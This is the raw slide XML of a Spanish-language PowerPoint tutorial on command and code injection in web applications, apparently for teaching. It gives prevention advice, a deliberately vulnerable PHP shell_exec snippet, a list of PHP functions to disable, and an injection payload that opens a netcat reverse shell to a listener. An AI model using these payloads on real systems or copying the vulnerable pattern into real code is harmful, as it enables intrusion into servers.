            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de la aplicación y el sistema operativo, como </a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1700" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>marcas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comentarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>caracteres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de terminación de línea </a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>delimitadores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comandos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Si </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su aplicación solo espera un conjunto limitado de valores, acepte solo esos valores, por ejemplo al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incluirlos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en la lista blanca o activarlos condicionalmente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8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CR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evite construcciones de evaluación vulnerables: si es posible, evite usar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> () y funciones equivalentes en entradas de usuario sin procesar. Utilice funciones específicas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>del lenguaje de programación para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>procesar con seguridad los argumentos proporcionados por el usuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.php.net/manual/es/function.eval.php</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1700" dirty="0" smtClean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r>
              <a:rPr lang="es-CR" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limitar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la funcionalidad del intérprete al mínimo requerido para que su aplicación evite la escalada a la inyección de comandos del sistema. </a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1700" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ejemplo, si su aplicación PHP no usa la función </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (), puede deshabilitar esa función en su archivo php.ini especificándola en la directiva </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>disable_functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Las funciones comúnmente deshabilitadas para PHP incluyen: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exec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passthru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shell_exec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system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proc_open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (), popen (), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl_exec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curl_multi_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parse_ini_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> () y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show_source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8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285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198922" cy="43158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R" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyección de comandos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Vamos a programar una aplicación que corra algunos comandos de sistema. A la vez si el comando no existe entre su lógica va a imprimir un error.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Errores dentro de este código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No inspeccionar la data que ingreso el usuario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Usar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para ejecutar comandos del sistema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se puede utilizar echo en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> en vez de echo de Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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158655" cy="48655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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyección de comandos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800" b="1" dirty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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyeccion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-de-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comandos.php</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800" b="1" dirty="0" smtClean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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = $_GET['input'];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$mensaje = "echo 'Comando " . $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> . " es invalido, ingrese alguno de los comandos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'";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echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($mensaje);</a:t>
            </a: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Podemos ver que la variable $mensaje contiene el comando echo (Linux) y además contiene el valor de una variable llamada $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, no hay mecanismo que inspeccione el valor de $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a: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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contruyendo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> el comando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echo 'Comando $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> es invalido, ingrese alguno de los comandos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill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echo 'Comando' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> echo 'es invalido, ingrese alguno de los comandos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Resultado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echo 'texto' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> echo '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6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternativa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echo 'texto' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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>
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo '  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D64923"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ejemplos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D64923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61073"/>
            <a:ext cx="8158655" cy="48655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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyección de comandos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Como explotar este ejemplo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Ahora </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que pudimos ejecutar el comando de sistema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“date” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sabemos que podemos correr otros.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Intentemos una conexión reversa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Computadora atacante (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 4444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Browser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R" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -e /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 127.0.0.1 4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> echo '  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>
              <a:solidFill>
                <a:srgbClr val="FFDBB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R" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como resultado tenemos una conexión con el usuario www-data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDB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1471</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>188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Técnicas básicas de Inyección de comandos e Inyección de código (Web)</vt:lpstr>
      <vt:lpstr>Técnicas básicas de Inyección de comandos e Inyección de código (Web)</vt:lpstr>
      <vt:lpstr>Que son Inyección de comandos e Inyección de código?</vt:lpstr>
      <vt:lpstr>Como ocurre? </vt:lpstr>
      <vt:lpstr>Como prevenirlos?</vt:lpstr>
      <vt:lpstr>Como prevenirlos?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Vry4n</dc:creator>
  <cp:lastModifiedBy>Vry4n</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-31T15:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-27T03:12:37Z</dcterms:modified>
</cp:coreProperties>
</file>